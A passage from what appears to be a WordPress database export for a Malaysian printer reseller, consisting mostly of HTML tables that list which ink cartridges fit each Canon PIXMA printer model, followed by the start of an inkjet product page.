width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP245</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP258</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP276</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MP287</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP460</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP476</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP486</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP496</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP497</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP500</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP520</p></td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP530</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP568</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP600</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MP610</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP628</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP638</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP648</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800R</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP810</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP830</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP970</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP988</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP996</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MX308</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX328</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX338</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX347</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX366</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX426</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX876</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX886</p></td><td width=\"208\"><p>CLI-726 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-725 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-1</p></td><td width=\"208\"><p>PGI-29 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Dark Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Yellow)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-10</p></td><td width=\"208\"><p>PGI-72 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-100</p></td><td width=\"208\"><p>CLI-42 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA TR8570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS207</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS307</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5070</p></td><td width=\"208\"><p>CLI-771 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5170</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA TS8270</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9170</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr></tbody></table>','Canon','','inherit','closed','closed','','1449-revision-v1','','','2019-09-25 08:32:00','2019-09-25 00:32:00','',1449,'https://bintara.com.my/blog/2019/09/25/1449-revision-v1/',0,'revision','',0),(3326,1,'2019-09-25 10:04:57','2019-09-25 02:04:57','<h2>Injet Printers :-</h2>		\n			<h4>PIXMA E560 / E560R</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Advanced Wireless All-In-One with Auto DuplexÂ Printing for Low-Cost Printing</p><p>The Ink Efficient E560 / E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.</p><p>Available in Black and Red.</p><p>Print, Scan, Copy</p><p>ISO Standard print speed (A4): up to 9.9ipm black / 5.7ipm colour</p><p>Hi-speed USB 2.0, WiFi</p><p>Recommended print volume: 80 - 400 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA E4270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\" alt=\"\" 